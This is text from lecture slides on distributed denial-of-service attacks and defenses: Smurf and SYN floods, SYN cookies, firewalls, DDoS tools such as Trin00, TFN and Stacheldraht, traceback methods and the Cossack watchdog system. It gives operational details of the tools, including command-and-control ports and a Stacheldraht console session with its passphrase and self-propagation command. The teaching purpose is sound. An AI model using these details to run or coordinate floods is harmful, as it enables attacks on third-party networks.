Distributed Denial of Service Attacks (DDoS)

Christos Papadopoulos

Some Common Dos Attacks

Smurf SYN flood UDP floods

Smurf Attack

attacker

target

broadcastecho request

source address is spoofed to be

target’s address

many echo replies are received by the target, since most machines

on the amplifier network respond to the broadcast

amplifiernetwork

TCP SYN FloodingA potentially more powerful attack

client(port = 33623/tcp)

server(port = 23/tcp)

SYN

SYN - ACK

ACK

[session proceeds][ACK set for remainder of session]

target(port = 23/tcp)

SPOOFED SYN

SYN - ACK

FINAL ACK NEVER SENT

nonexistent host

Protection against SYN Protection against SYN AttacksAttacksSYN cookies: (D.J. Bernstein and Eric Schenk) avoid

half-open TCP connections.

• Server responds to TCP SYN request with a cookie by SYN-ACK with:

sqn =f (src addr, src port, dest addr, dst port, secret seed)

•Server releases all state.

• If an ACK comes from the client, server checks if it’s a response to former SYN-ACK.

• If yes, the server enters the TCP_ESTABLISHED state.

SYN Cookie ExchangeSYN Cookie Exchange

SYN cookies firewall

SYN cookies firewall adds a firewall feature in Linux.

client firewall server 1. SYN2. SYN-ACK(cookie) 3. ACK4. SYN

5. SYN-ACK 6. ACK 7. relay the

connection

Under attack, step 3 will never occur.

  What Is a Firewall?

An access control device that performs perimeter security by deciding which packets are allowed or denied into or out of a network. May be a hardware device or a software program

running on a secure host computer. Sits at a junction point or gateway between two

networks (e.g., public internet and private intranet).

  Firewall Location

  Firewall Types

  Why a Firewall?

Analogy: a firewall keeps a fire from spreading from one part of the building to another.

Prevents the dangers of the Internet from spreading to your internal network.                               

•   Restricts packets to entering at a carefully controlled point.

•   Prevents attackers from getting close to your other defenses.

•   Restricts packets to leaving at a carefully controlled point ..

What Does a Firewall Do?

A firewall is an aggregation point for security decisions.

A firewall can enforce security policy. A firewall can log Internet activity efficiently. A firewall protects the network as a resource. A firewall limits your exposure. A firewall can provide protection for vulnerable

services.

What Does a Firewall Not Do?

A firewall can’t protect you against: malicious insiders careless employees connections that don’t go through it viruses and trojans, data-driven attacks illicit rendezvous (unauthorized tunneled connections) completely new threats

Additional security measures must be incorporated along with the firewall. (Physical security, host security, user education)

Caveats

Firewall technology can provide a false sense of security. May lead to lax security within the firewall perimeter. Analogy: firewalls provide “a hard, crunchy outside

with a soft chewy center.”

A misconfigured firewall is ineffective. Firewalls must be maintained and updated daily. Audit logs must be actively monitored.

What Is DDoS

Distributed Denial of Service New, more pernicious type of attack Many hosts “gang” up to attack another host Network resource attack:

Bandwidth State

Why Should We Care

Successfully used to attack prominent sites in the Internet by those with a primitive understanding of internet protocols

It is relatively easy to do, but hard to detect and stop

It is only going to get worse unless we develop adequate protection mechanisms

Anatomy of an Attack

Compromise a large set of machines Install attack tools Instruct all attack machines to initiate attack

against a victim

Process highly automated

Phase 1: Compromise

A (stolen) account is used as repository for attack tools.

A scan is performed to identify potential victims.

A script is used to compromise the victims.

Phase 2: Install Attack Tools

• An automated installation script is then run on the “owned” systems to download and install the attack tool(s) from the repository.

• Optionally, a “root kit” is installed on the compromised systems.

Phase 3: Launch attackPhase 3: Launch attack

•Launch a coordinated DDoS from different sites against a single victim.

•Network pipes of attackers can be small, but aggregated bw is far larger than victim’s pipe.

•Victim’s ISP may not notice elevated traffic.

•DDoS attacks are harder to track than a DoS.

Some Known DDoS Attack Some Known DDoS Attack ToolsTools

Trin00

Tribal Flood Network (TFN)

Tribal Flood Network 2000 (TFN2K)

Stacheldraht

Distributed SYN attack.

Attacker connects to port 27665 on master machines using telnet.

Master relays the commands to the daemons using UDP port 27444.

Daemons carry out commands and respond on UDP port 31335.

Trin00Trin00

General design similar to trin00.

Capable of number of attacks such as ICMP flood, SYN flood, UDP flood and SMURF style attacks.

Communication between clients and daemons is done via ICMP echo replies. Commands are hidden inside id field of ICMP packet.

Traffic looks identical to the standard ping and hence impossible to block at a firewall without blocking outgoing pings.

Absence of TCP and UDP traffic makes these packets difficult to detect.

TFNTFN

TFN2K communicates via TCP,UDP (random ports), ICMP Echo replies or all three at random.

Daemon never responds to the master.

The Master sends all commands twenty times for reliability.

TFN2K sends out decoy packets to random machines to make it unclear, which machines are clients.

All commands are encrypted via a compile time password.

TFN2k daemons can randomly alternate different types of attacks.

TFN2KTFN2K

Combines features of the trin00 with those of TFN.

Adds encryption of communication between the attacker and masters and automated update of agents.

Communication between attacker and masters take place on tcp port 16660.

Daemons receive commands from masters through ICMP echo replies (using data part of packet).

Possible attacks are ICMP flood, UDP flood, SYN flood and SMURF attack.

StacheldrahtStacheldraht

# ./client 192.168.0.1[*] stacheldraht [*](c) in 1999 by ...trying to connect...connection established.--------------------------------------enter the passphrase : sicken--------------------------------------entering interactive session.******************************welcome to stacheldraht******************************type .help if you are lamestacheldraht(status: a!1 d!0)>

stacheldraht(status: a!1 d!0)>.helpavailable commands in this version are:--------------------------------------------------.mtimer .mudp .micmp .msyn .msort .mping.madd .mlist .msadd .msrem .distro .help.setusize .setisize .mdie .sprange .mstop .killall.showdead .showalive--------------------------------------------------stacheldraht(status: a!1 d!0)>

Some Commands--------.distro user server

Instructs the agent to install and run a new copy of itself

using the Berkeley "rcp" command, on the system "server",

using the account "user" (e.g., "rcp user@server:linux.bin ttymon")

.madd ip1[:ip2[:ipN]]Add IP addresses to list of attack victims.

.madd ip1[:ip2[:ipN]]Add IP addresses to list of attack victims.

.mdieSends die request to all agents.

Spoof Testing

The agent performs a test to find whether the system provides for spoofing or not.

The agent sends out an ICMP packet with ID 666 and IP address 3.3.3.3.

The IP address of the compromised machine - embedded in the data field.

Handler gets the IP address of the agent and replies back with the ID 1000 and data field containing “spoofworks” and sets the spoof level to 0; Else it sets the spoof level to 3 suggesting that only last octet can be spoofed.

Defending Against DDoS

Prevent compromise of machines with Intrusion Detection Systems (IDS)

Trace back to the attacker Develop automated network defense

mechanisms

Intrusion Detection: Snort

Packet sniffing network intrusion detection system

Libpcap-based sniffing interface Rules-based detection engine Multiple output options

Decoded logs, tcpdump formatted logs Real-time alerting to syslog, file, winpopup

© Copyright 1999, Martin Roesch

USENIX LISA ‘99 Conference

Detection Engine Rules form “signatures” Modular detection elements are combined

to form these signatures Anomalous activity detection is possible

Stealth scans, OS fingerprinting, invalid ICMP codes, etc

Rules system is very flexible, and creation of new rules is relatively simple

© Copyright 1999, Martin Roesch

USENIX LISA ‘99 Conference

Traceback Techniques

Logging Link testing Node append Node sampling Overlays Edge sampling Trace messages

Why Traceback Is Hard

IP source address is spoofed:Form IP packets with forged source

address.Send them using a socket of type

SOCK_RAW.Requires root privilege.

Avoiding Spoofed Packets

Ingress filtering Prohibits an attacker from forging an IP address At first hop router do

If packet’s src IP address is within the predefined range

Then forward packet

Else drop packet

(-) Mobile hosts uses home network address in mobile IP

Logging (Audit Trailing )

Record packets at predetermined routers and use data-mining techniques to construct path traversed by the packet (+) Easy (+) Permits post-mortem analysis (-) Requires large amount of disk and computing

resources (-) Requires Maps for reconstruction (-) Manual, Time – consuming

Link Testing

Involves interactively testing the upstream links starting from the victim to determine the links used to carry the attacker’s traffic

Two techniques :- Input debugging Controlled flooding

Link Testing (Input Debugging)

Determine the attack signature. Filter packets at egress port and determine

at which ingress port they arrived. Perform iteratively at all upstream routers

till the source(s) are found. (-) Relies heavily on manual intervention

and extremely slow. (-) Requires inter-ISP co-operation.

Link Testing (Controlled Flooding)

Flood links with large amounts of UDP traffic (UDP-chargen).

Observe changes in traffic pattern.

Reconstruct path to attacker recursively.

Victim

R1

R3 R4

R2

R5

A

B

Attacker

UDP chargen request

chargen reply

attack packets

Link Testing (Controlled Flooding)

(+) Effective

(-) Requires information about the internet topology

(-) Inherently noisy

(-) Difficult to discern the set of paths incase of DDoS attacks

(-) DoS attack by itself

(-) Requires co-operation from upstream routers

Node Append

Record the route in the packet as it traverses the routers

Each router appends its IP address to the end of the packet (+) Easy to implement (+) Single packet required to find attack path (-) Increases the packet size (4 bytes/hop) (-) Processing overhead (-) Fragmentation

Node Sampling

Each router inserts its IP address in a static field with a probability p

p(1 – p)d-1 is the probability of receiving a packet from a router at a distance d

Reconstruction Algorithm : Rank each router by the number of samples received Reconstruct path using ranks

(-) Need more than 42,000 samples for d=15 and p=0.51 before a single packet from the first hop router

CenterTrack

IP Tunnels

v

a

Create an overlay network using IP tunnels

Tunnels are created between edge and transit routers

Based on attack signature perform logging and/or corrective action in the overlay network

CenterTrack (Cont…)

(+) Eliminates need for transit router input debugging

(+) Required features available (+) Is not too expensive (+) Scales well (-) Still requires input debugging at edge (-) Changes route. (Attackers might notice.)

Edge Sampling

Three fields :- Two IP’s (start and end of edge) Distance

When a router decides to mark, it makes the distance field 0

Next router either rewrites and makes distance 0 or fills in remaining (end IP) information and increments distance

Other routers increment distance field or start afresh p < 1

Edge Sampling Algorithm

At router Rfor each packet pkt

u [0, 1)if u > p

pkt.distance 0pkt.startIP R.IP

elseif (pkt.distance == 0)

pkt.endIP R.IPpkt.distance pkt.distance + 1

ICMP Traceback

Concept :- Generate packets with a probability p at

intermediate routers destined for the victim Routers encode partial path information in

packet Victim can reconstruct the attack path with

sufficient number of trace packets

ICMP Traceback

Create a new type of ICMP messages called ICMP Traceback (in IETF standards process).

Packet size limited to 576 bytes. Traceback messages generated with

probability of 1/20,000. Initial TTL of the new IP packet MUST be

255.

ICMP Traceback

Cossack

Cossack Overview

Distributed set of watchdogs monitor the networkLocalized IDS for blind detectionTopology information to pre-filter targetGroup communication for robustness

Distributed coordinationNo centralized controllerAttack-driven dynamic grouping of watchdogsConsult with other watchdogs to correlate attacksSelectively deploy countermeasures to suppress

attacks

Cossack: A Simplified View

WW

W

target

watchdog

attacker

attacker

attacker

attacker

watchdog

watchdog

watchdog

watchdog

Attacks Begin

WW

W

target

watchdog

attacker

Watchdogs Communicate Using YOID

WW

W

target

watchdog

attacker

YOID

Attacks Detected

WW

W

target

watchdog

attacker

YOID

Watchdogs Install Filters and Eliminate Attack

WW

W

target

watchdog

attacker

Attack No 4

Ping reflection attack (40-byte packets) Victim: Server at USC Attackers: 145 reflectors located in Brazil, Japan,

Korea, Singapore, United States. Zombie location unknown

Duration: 285 seconds Sample trace (anonymized):

1025390161.422173 192.168.123.4 > 10.12.30.4: icmp: echo reply (DF) 1025390161.422178 10.0.4.5 > 10.12.30.4: icmp: echo reply (DF) 1025390161.422757 192.168.3.5 > 10.12.30.4: icmp: echo reply (DF)

Attack 4: Packet Rate

Attack 4: Bandwidth

Attack 4: Transient Behavior

Attack 13: Attack Description

Attack Specification Victim: Server at Caltech Spoofed source addresses (> 100,000) Duration: 1794 seconds

Sample trace: 1026570396.847625 10.0.8.9.22803 > 10.2.2.1.44758: . ack 0 win 8459

1026570396.847630 192.168.123.4.59606 > 10.2.2.1.44649: . ack 0 win 3584

1026570396.847635 10.0.5.1.6616 > 10.2.2.1.44765: . ack 0 win 10

1026570396.847639 0.0.0.0.23139 > 10.2.2.1.44766: . ack 0 win 48231

Attack 13: Packet Rate

Attack 13 Transient Behavior

FFT Analysis Attack 4 Attack 13

Demo

Goal: capture low-level pulsing attacks that elude normal SNMP statistics

Scenario: Victim is attacked by many low-level pulsing streams SNMP sampling too coarse to isolate attackers Watchdog at victim asks watchdogs at source network

to change sampling interval Attack stream detected

Real life event faced by net admin at USC

Demo Testbed

W

W

W

A1

A2

A3

Target

Traffic monitor (MRTG)

Attack Begins

W

W

W

A1

A2

A3

TargetPulsing Attack 1% Strength

Pulsing Attack 98% Strength(Represents 98 other hosts)

Pulsing Attack 1% Strength

MRTG sampling too slow to catch individual low-strength attacks, but sees full-strength attack.

Watchdogs Communicate

W

W

W

A1

A2

A3

TargetPulsing Attack 1% Strength

Pulsing Attack 98% Strength(Represents 98 other hosts)

Pulsing Attack 1% Strength

- Victim watchdog analyzes attack traffic and determines list source addresses.- Forms Yoid group with upstream watchdogs.

Watchdogs Scrutinize Traffic

W

W

W

A1

A2

A3

TargetPulsing Attack 1% Strength

Pulsing Attack 98% Strength(Represents 98 other hosts)

Pulsing Attack 1% Strength

-Watchdogs reduce monitoring interval and detect the attack streams

Watchdogs Install Filters

W

W

W

A1

A2

A3

TargetPulsing Attack 1% Strength

Pulsing Attack 98% Strength(Represents 98 other hosts)

Pulsing Attack 1% Strength

- Upstream Watchdogs install filters in router to block attack

Attack Neutralized

W

W

W

A1

A2

A3

TargetPulsing Attack 1% Strength

Pulsing Attack 98% Strength(Represents 98 other hosts)

Pulsing Attack 1% Strength